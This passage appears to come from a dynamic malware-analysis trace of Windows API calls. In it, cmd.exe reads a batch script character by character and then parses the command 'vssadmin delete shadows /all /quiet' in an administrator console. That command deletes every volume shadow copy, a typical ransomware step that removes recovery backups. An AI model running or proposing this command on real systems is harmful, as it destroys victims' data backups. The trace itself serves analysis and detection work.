lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.991] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c44, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.991] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.991] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.991] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.991] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c46, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0135.991] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.991] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.991] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.991] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c48, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.991] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.991] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.991] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.991] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4a, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0135.991] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.991] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.992] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.992] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.992] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.992] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.992] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.992] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.992] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.992] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.992] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.992] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c50, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0135.992] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.992] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.992] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.992] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c52, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0135.992] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.992] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.992] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.992] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0135.992] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.992] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.992] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.992] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c56, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0135.992] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.992] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.992] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.992] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c58, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0135.993] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.993] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.993] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.993] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0135.993] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.993] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.993] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.993] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0135.993] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.993] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.993] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.993] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c5e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.993] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.993] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.993] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.993] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c60, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0135.993] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.993] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.993] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.993] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c62, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0135.993] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.993] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.993] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.993] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c64, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0135.993] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.993] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.994] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.994] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c66, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0135.994] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.994] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.994] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.994] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c68, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.994] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.994] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.994] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.994] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0135.994] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.994] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.994] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.994] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0135.994] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.994] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.994] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.994] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c6e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0135.994] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.994] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.996] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.996] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c70, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0135.996] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.996] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.996] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.996] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c72, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0135.996] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.996] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.996] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.996] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c74, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0135.996] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.997] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.997] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.997] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c76, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0135.998] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.998] GetFileType (hFile=0x248) returned 0x3 [0135.998] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.998] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.998] GetFileType (hFile=0x254) returned 0x3 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.998] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0135.998] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x8dc3d4f798, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f798*=0x24, lpOverlapped=0x0) returned 1 [0135.998] GetProcessHeap () returned 0x27a547e0000 [0135.998] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x4012) returned 0x27a547e8bb0 [0135.998] GetProcessHeap () returned 0x27a547e0000 [0135.998] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e8bb0) returned 1 [0135.999] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0135.999] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0135.999] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0135.999] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0135.999] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0135.999] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0135.999] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0135.999] GetProcessHeap () returned 0x27a547e0000 [0135.999] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xb0) returned 0x27a547e6e30 [0135.999] GetProcessHeap () returned 0x27a547e0000 [0136.000] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x22) returned 0x27a547e6c60 [0136.000] GetProcessHeap () returned 0x27a547e0000 [0136.000] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x48) returned 0x27a547e8bb0 [0136.001] GetConsoleOutputCP () returned 0x1b5 [0136.001] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0136.001] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.002] GetConsoleTitleW (in: lpConsoleTitle=0x8dc3d4f5e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0136.002] malloc (_Size=0xffce) returned 0x27a549d0840 [0136.002] ??_V@YAXPEAX@Z () returned 0x27a549d0840 [0136.003] malloc (_Size=0xffce) returned 0x27a549e0820 [0136.003] ??_V@YAXPEAX@Z () returned 0x27a549e0820 [0136.004] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0136.004] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0136.004] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0136.004] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0136.004] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0136.004] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0136.004] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0136.004] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0136.004] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0136.004] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0136.004] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0136.004] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0136.004] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0136.004] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0136.004] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0136.004] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0136.004] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0136.004] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0136.004] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0136.004] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0136.004] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0136.004] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0136.004] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0136.004] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0136.004] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0136.004] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0136.004] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0136.004] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0136.004] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0136.004] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0136.005] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0136.005] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0136.005] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0136.005] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0136.005] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0136.005] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0136.005] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0136.005] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0136.005] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0136.005] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0136.005] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0136.005] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0136.005] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0136.005] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0136.005] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0136.005] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0136.005] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0136.005] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0136.005] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0136.005] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0136.005] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0136.005] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0136.005] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0136.005] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0136.005] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0136.005] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0136.005] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0136.005] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0136.005] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0136.005] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0136.005] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0136.005] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0136.005] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0136.005] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0136.005] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0136.005] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0136.005] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0136.006] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0136.006] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0136.006] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0136.006] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0136.006] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0136.006] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0136.006] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0136.006] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0136.006] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0136.006] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0136.006] 